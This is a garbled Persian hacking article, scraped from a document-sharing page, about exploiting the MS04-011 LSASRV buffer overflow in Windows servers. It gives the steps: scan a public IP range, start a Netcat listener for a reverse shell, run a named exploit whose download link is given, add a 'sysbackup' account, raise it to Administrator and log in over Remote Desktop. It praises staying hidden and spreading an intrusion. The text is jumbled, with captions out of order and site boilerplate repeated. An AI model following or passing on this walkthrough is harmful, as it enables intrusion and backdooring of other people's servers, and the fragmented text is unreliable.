‫ﺍﺳﺖ ‪ ....‬ﺩﻭﺑﺎﺭﻩ ﺳﻌﻲ ﮐﻨﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﻫﻤﻴﻦ ‪ Exploit‬ﻭﺍﺭﺩ ﺷﻮﻳﺪ ﻭﻟﻲ ﺍﻳﻦ ﺑﺎﺭ ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ‬
‫ﮔﺮﭼﻪ ﻧﻔﻮﺫ ﺑﻪ ﻳﮏ ﺳﻴﺴﺘﻢ ﮐﺎﺭ ﺁﺳﺎﻧﻲ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺑﺎﺷﺪ ﻭﻟﻲ ﺁﺯ ﺍﻥ ﻧﻴﺰ ﭘﻴﭽﻴﺪﻩ ﺗﺮ ﮔﺴﺘﺮﺵ ﻧﻔﻮﺫ‬
‫ﻭ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻣﺎﻧﺪﻥ ﺍﺳﺖ ﻫﻨﺮ ﺍﺻﻠﻲ ﻫﮏ ﺩﺭ ﻫﻤﻴﻦ ﻧﮑﺘﻪ ﻣﺘﺒﻠﻮﺭ ﻣﻲ ﺷﻮﺩ‪.....‬‬
‫ﮐﻼﻡ ﺁﺧﺮ ‪ :‬ﻣﻬﻢ ﺍﻳﻦ ﻧﻴﺴﺖ ﮐﻪ ﭼﻄﻮﺭ ﺑﻪ ﻫﺪﻑ ﺧﻮﺩ ﻧﻔﻮﺫ ﻣﻲ ﮐﻨﻴﺪ ﺑﻠﮑﻪ ﻣﻬﻢ ﺍﻳﻦ ﺍﺳﺖ ﮐﻪ ﻧﻔﻮﺫ‬
‫ﺧﻮﺩ ﺭﺍ ﭼﮕﻮﻧﻪ ﮔﺴﺘﺮﺵ ﻣﻲ ﺩﻫﻴﺪ ﻭ ﺍﺯ ﻧﻔﻮﺫ ﺧﻮﺩ ﭼﻪ ﺍﻫﺪﺍﻓﻲ ﺭﺍ ﺩﻧﺒﺎﻝ ﻣﻲ ﮐﻨﻴﺪ ‪ .‬ﺧﻮﺍﻫﺸﻤﻨﺪﻳﻢ ﺍﺯ‬
‫ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺑﺮﺍﻱ ﺍﻣﻦ ﮐﺮﺩﻥ ﺳﺮﻭﺭﻫﺎﻱ ﺧﻮﺩ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ ﻭﺑﻪ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﮔﻮﺷﺰﺩ ﮐﻨﻴﺪ ﻭ ﺍﮔﺮ ﺑﻪ‬
‫ﭼﻨﻴﻦ ﺑﺎﮔﻲ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﭘﻲ ﺑﺮﺩﻳﺪ ﺑﻪ ﻧﺼﺐ ﭘﭻ ﻫﺎﻱ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﺍﻗﺪﺍﻡ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭ ﺯﻳﺮ‬
‫‪ Source‬ﺍﻳﻦ ‪ Exploit‬ﺭﺍ ﺑﺮﺍﻱ ﮐﺎﺭﺑﺮﺍﻧﻲ ﮐﻪ ﻣﺴﻠﻂ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺑﻪ ﺯﺑﺎﻥ ‪ C‬ﻫﺴﺘﺪ ﺭﺍ‬
‫ﻗﺮﺍﺭ ﻣﻲ ﺩﻫﻴﻢ‬
‫ﺩﺭ ﺻﻮﺭﺕ ﻫﺮ ﮔﻮﻧﻪ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻣﺸﮑﻞ ﻟﻄﻔﺎ ﺑﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﻓﺮﻣﺎﻳﻴﺪ‬
‫ﺿﻤﻨﺎ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﺳﺮﻉ ﻭﻗﺖ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﻣﻲ ﺷﻮﺩ ‪.‬‬
‫‪Mohsen2_ir@yahoo.com‬‬
‫‪Liv4devil@yahoo.com C0llect0r@Spymac.com‬‬
‫ﻓﺎﻳﻞ ‪ Exploit‬ﺭﺍ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﺩﺭﺱ ﺯﻳﺮ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪:‬‬

‫‪http://www.websecuritymgz.com/articles/lss.c‬‬

Lsasrv - DLL RPC Buffer Overflow Remote Exploit: Black - Devils B0ys Digital Network Security Group

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Lsasrv - DLL RPC Buffer Overflow Remote Exploit: Black - Devils B0ys Digital Network Security Group

Uploaded by

Copyright:

Available Formats

‫ ﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ‬LSASRV.

Black_Devils B0ys Digital Network Security Group

‫ﺷﺮﺣﻲ ﺑﺮ ﻧﻔﻮﺫﭘﺬﻳﺮﻱ ﻣﻮﺳﻮﻡ ﺑﻪ‬

C0llect0r ‫ ﻣﺤﺴﻦ ﻣﺤﻤﺪﻱ ﻭ‬: ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ‬

‫ ﺍﻣﻴﺮ ﺣﺴﻴﻦ ﺷﺮﻳﻔﻲ‬: ‫ﺗﺼﺤﻴﺢ‬

۱۳۸۳ ‫ ﺗﻴﺮﻣﺎﻩ‬۲۷ : ‫ﺗﺎﺭﻳﺦ‬

Miicrosoft- eEye - Security Focus- : ‫ﻣﻨﺎﺑﻊ‬

‫ﺑﺎ ﮐﻨﺠﮑﺎﻭﻱ ﻣﻦ ﻭ ﻳﮏ ﺳﺮﻱ ﺍﺯ ﺩﻭﺳﺘﺎﻧﻢ ﻳﻪ ﺷﻴﻮﻩ ﺟﺪﻳﺪﻱ ﺍﺯ ﻫﮏ ﺳﺮﻭﺭﻫﺎﻱ ‪Microsoft IIS‬‬

‫ﺭﻭﻳﻪ ﺍﻣﻨﻴﺘﻲ ﺍﮐﺎﻧﺖ ﻫﺎ ﺑﻪ ﺁﻥ ﮐﻨﺘﺮﻝ ﻣﻲ ﺷﻮﻧﺪ ﺭﺍ ﺍﺯ ﮐﺎﺭ ﻣﻲ ﺍﻧﺪﺍﺯﺩ‪.‬ﻫﻤﭽﻨﻴﻦ ﺭﻭﺵ ﮐﺎﺭ‬

‫ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﮐﻪ ﺧﻮﺍﻧﺪﻳﺪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﻞ ﺑﻌﺪﻱ )‪ Next Ggeneration (NG‬ﮐﺮﻡ ‪ Sasser‬ﻣﻲ‬

‫)‪172.16.x.x - 172.31.x.x (inclusive‬‬ ‫•‬

‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ‪:‬‬

‫) ‪1 : Nmap (Current Version is 3.50 as of this writing‬‬

‫)‪3: GFI Lan Guard Security Scanner or DSScan (version 2004‬‬

‫)‪4: HOD-ms04011-lsasrv-expl.c( Compile This Source‬‬

‫‪5:Terminal Server&Client or WinVNC3‬‬

‫‪ Configure‬ﮐﺮﺩﻥ ﺍﺳﮑﻨﺮ ﺩﺍﺭﺩ ﮐﻪ ﺍﮔﺮ ﺑﻪ ﺧﻮﺑﻲ ‪ Configure‬ﻧﺸﻮﺩ ﺷﻤﺎ ﺭﺍ ﻣﻲ ﺗﻮﺍﻧﺪ ﺩﺭ ﻧﺘﺎﻳﺞ‬

‫)ﺍﺳﮑﻨﺮ ‪( GFI Languard Security Scanner v5‬‬

‫‪ DSScan‬ﻧﺮﻣﺎﻓﺰﺍﺭﻱ ﺍﺳﺖ ﮐﻪ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﺣﻔﺮﻩ ﺷﺮﻭﻉ ﺑﻪ ﻓﺮﺳﺘﺎﺩﻥ ‪ echo packets‬ﺑﻪ‬

‫‪ :۱‬ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﻣﻦ ﻳﮏ ﺣﻮﺯﻩ ﺍﺯ ‪ IP‬ﻫﺎ ﺭﺍ ﺍﺯ ‪ 217.218.13.1-217.218.13.254‬ﺍﺳﮑﻦ ﻣﻲ‬

‫) ﻋﻤﻠﻴﺎﺕ ﺍﺳﮑﻦ ﺗﻮﺳﻂ ‪( DSScan‬‬

‫) ﺍﺟﺮﺍﻱ ‪ Exploit‬ﺑﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ (‬

‫ﺍﻟﻒ ‪ :‬ﻗﺒﻞ ﺍﺯ ﺍﺟﺮﺍﻱ ‪ Exploit‬ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ ‪ Netcat‬ﭘﻮﺭﺕ ‪ ۵۰۰۰‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ‬

‫) ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺩﺭ ﺣﺎﻟﺖ ﺷﻨﻮﺩ ﺑﺮ ﺭﻭﻱ ﭘﻮﺭﺕ ‪(۵۰۰۰‬‬

‫)ﮔﺮﻓﺘﻦ ‪ Shell‬ﺍﺯ ﻃﺰﻳﻖ ‪( Telnet‬‬

‫)ﻧﻤﺎﻳﺶ ‪ Account‬ﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺑﺮ ﺭﻭﻱ ﻫﺪﻑ (‬

‫)ﺍﺿﺎﻓﻪ ﮐﺮﺩﻥ ﻳﮏ ﺍﮐﺎﻧﺖ ﺟﺪﻳﺪ ﺑﻪ ﻧﺎﻡ ‪(sysbackup‬‬

‫)ﻣﺸﺎﻫﺪﻩ ﻣﺠﺪﺩ ﺍﮐﺎﻧﺖ ﻫﺎ(‬

‫)ﻣﺸﺎﻫﺪﻩ ﺟﺰﻳﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﮐﺎﻧﺖ ﺍﻳﺠﺎﺩ ﺷﺪﻩ(‬

‫) ﺗﺒﺪﻳﻞ ﺍﮐﺎﻧﺖ ﺟﺪﻳﺪ ﺑﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻤﻲ ‪(Administrator‬‬

‫ﺑﺎﺯ ﺍﺯ ‪ sysbackup‬ﺧﺼﻮﺻﻴﺎﺕ ﻣﻲ ﮔﻴﺮﻡ ﻭ ﺑﻪ ﺳﻄﺮ ‪ Local Group Memberships‬ﺗﻮﺟﻪ‬

‫ﺍﻻﻥ ‪ sysbackup‬ﻳﮏ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻤﻲ ﺍﺳﺖ‬

‫)ﻣﺸﺎﻫﺪﻩ ﻣﺠﺪﺩ ﺟﺰﻳﻴﺎﺕ ﻳﻮﺯﺭ ﺟﺪﻳﺪ (‬

‫) ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﭘﺴﻮﻭﺭﺩ ﺭﻭﻱ ﺍﮐﺎﻧﺖ (‬

‫)ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﻃﺮﻳﻖ ‪(Remote Desktop Connection‬‬

‫) ﻭﺍﺭﺩ ﺷﺪﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﺍﺯ ﻃﺮﻳﻖ ‪(GUI‬‬

‫ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻬﻲ ‪ Remote Shutdown Dialog‬ﮐﻪ ﺩﺭ ‪ Microsoft 2k/XP/2003Server‬ﺑﻪ‬

‫ﻓﺎﻳﻞ ‪ Exploit‬ﺭﺍ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﺩﺭﺱ ﺯﻳﺮ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪:‬‬

You might also like